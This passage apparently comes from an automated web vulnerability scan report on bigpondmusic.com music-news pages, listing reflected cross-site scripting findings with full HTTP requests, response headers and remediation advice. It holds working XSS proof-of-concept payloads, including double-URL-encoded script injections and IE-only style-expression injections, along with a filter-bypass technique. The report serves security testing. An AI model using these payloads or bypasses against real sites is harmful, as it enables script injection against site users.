HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:14:50 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 87901
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21b5d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e72f772eb291 was submitted in the REST URL parameter 1. This input was echoed as 21b5d"><script>alert(1)</script>72f772eb291 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /news21b5d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e72f772eb291/article/5074/chris-brown-s-behaviour-praised-by-judge HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:14:48 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88680
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e0ebc%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebbaca8239bc was submitted in the REST URL parameter 2. This input was echoed as e0ebc"><script>alert(1)</script>bbaca8239bc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /news/articlee0ebc%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebbaca8239bc/5074/chris-brown-s-behaviour-praised-by-judge HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:15:06 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88006
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ec078'%3b1458de4a20a was submitted in the REST URL parameter 2. This input was echoed as ec078';1458de4a20a in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/articleec078'%3b1458de4a20a/5074/chris-brown-s-behaviour-praised-by-judge HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:15:09 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 87917
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b5157%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527e841f430404 was submitted in the REST URL parameter 4. This input was echoed as b5157'style='x:expression(alert(1))'e841f430404 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /news/article/5074/chris-brown-s-behaviour-praised-by-judgeb5157%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527e841f430404 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:15:46 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 117773
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a0fa%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee15c2fe88f7 was submitted in the REST URL parameter 4. This input was echoed as 8a0fa"><script>alert(1)</script>e15c2fe88f7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /news/article/5074/chris-brown-s-behaviour-praised-by-judge8a0fa%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee15c2fe88f7 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:15:27 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 117764
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
2.341. http://bigpondmusic.com/news/article/5074/chris-brown-s-behaviour-praised-by-judge [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc441"style%3d"x%3aexpression(alert(1))"d904e9febc5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bc441"style="x:expression(alert(1))"d904e9febc5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /news/article/5074/chris-brown-s-behaviour-praised-by-judge?bc441"style%3d"x%3aexpression(alert(1))"d904e9febc5=1 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:14:40 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 117947
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d6e2d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e011ebe267c was submitted in the REST URL parameter 1. This input was echoed as d6e2d"><script>alert(1)</script>011ebe267c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /newsd6e2d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e011ebe267c/article/5076/susan-boyle-sets-records-with-the-gift HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:14:40 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88121
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 455fa'%3b31e3657cda8 was submitted in the REST URL parameter 1. This input was echoed as 455fa';31e3657cda8 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news455fa'%3b31e3657cda8/article/5076/susan-boyle-sets-records-with-the-gift HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:14:43 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 87875
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2ff83'%3b3c86bf410e6 was submitted in the REST URL parameter 2. This input was echoed as 2ff83';3c86bf410e6 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/article2ff83'%3b3c86bf410e6/5076/susan-boyle-sets-records-with-the-gift HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:15:00 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88172
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b175%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e42c24c395fd was submitted in the REST URL parameter 2. This input was echoed as 4b175"><script>alert(1)</script>42c24c395fd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /news/article4b175%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e42c24c395fd/5076/susan-boyle-sets-records-with-the-gift HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:14:58 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88389
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5826%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7acee5fa8bb was submitted in the REST URL parameter 4. This input was echoed as a5826"><script>alert(1)</script>7acee5fa8bb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /news/article/5076/susan-boyle-sets-records-with-the-gifta5826%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7acee5fa8bb HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:15:17 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 112908
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8470e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25278ef5a8aecaf was submitted in the REST URL parameter 4. This input was echoed as 8470e'style='x:expression(alert(1))'8ef5a8aecaf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /news/article/5076/susan-boyle-sets-records-with-the-gift8470e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25278ef5a8aecaf HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:15:28 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 113515
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
2.348. http://bigpondmusic.com/news/article/5076/susan-boyle-sets-records-with-the-gift [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a68b4"style%3d"x%3aexpression(alert(1))"ea1ea53588b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a68b4"style="x:expression(alert(1))"ea1ea53588b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /news/article/5076/susan-boyle-sets-records-with-the-gift?a68b4"style%3d"x%3aexpression(alert(1))"ea1ea53588b=1 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:14:34 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 112850
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a59d5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e973d1c4b81e was submitted in the REST URL parameter 1. This input was echoed as a59d5"><script>alert(1)</script>973d1c4b81e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /newsa59d5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e973d1c4b81e/article/5078/jay-z-opens-up-about-shooting-brother-as-a-child HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
